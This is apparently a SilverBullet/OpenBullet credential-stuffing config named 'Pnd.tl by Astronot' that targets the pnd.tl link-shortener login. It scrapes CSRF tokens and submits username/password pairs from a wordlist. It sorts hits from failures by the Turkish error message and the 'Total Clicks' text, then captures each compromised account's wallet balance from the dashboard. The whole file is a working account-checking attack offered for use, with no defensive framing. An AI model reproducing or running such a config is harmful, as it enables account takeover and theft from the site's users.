[SETTINGS]
{
  "Name": "Pnd.tl by Astronot",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-06-06T15:46:33.9262736+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "astronot",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Pnd",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.pnd.tl/auth/signin" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"_csrfToken\" autocomplete=\"off\" value=\"" "\" /></div>" -> VAR "t1" 

PARSE "<SOURCE>" LR "type=\"hidden\" name=\"_Token[fields]\" autocomplete=\"off\" value=\"" "\" /><input" -> VAR "t2" 

REQUEST POST "https://www.pnd.tl/auth/signin" 
  CONTENT "_method=POST&_csrfToken=<t1>&username=<USER>&password=<PASS>&remember_me=0&_Token%5Bfields%5D=<t2>&_Token%5Bunlocked%5D=adcopy_challenge%257Cadcopy_response%257Ccaptcha_code%257Ccaptcha_namespace%257Cg-recaptcha-response" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  COOKIE "accept-encoding: gzip, deflate, br" 
  COOKIE "accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7" 
  COOKIE "cache-control: max-age=0" 
  COOKIE "content-type: application/x-www-form-urlencoded" 
  COOKIE "origin: https://www.pnd.tl" 
  COOKIE "referer: https://www.pnd.tl/auth/signin" 
  COOKIE "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\"" 
  COOKIE "sec-ch-ua-mobile: ?0" 
  COOKIE "sec-ch-ua-platform: \"Windows\"" 
  COOKIE "sec-fetch-dest: document" 
  COOKIE "sec-fetch-mode: navigate" 
  COOKIE "sec-fetch-site: same-origin" 
  COOKIE "sec-fetch-user: ?1" 
  COOKIE "upgrade-insecure-requests: 1" 
  COOKIE "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Geçersiz kullanıcı adı yada şifre, yeniden deneyiniz" 
  KEYCHAIN Success OR 
    KEY "Toplam Tıklama" 

REQUEST GET "https://www.pnd.tl/member/dashboard" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "class=\"ti-wallet fa-fw\"></i> Balance" "</a></li>" CreateEmpty=FALSE -> CAP "Bakiye" 

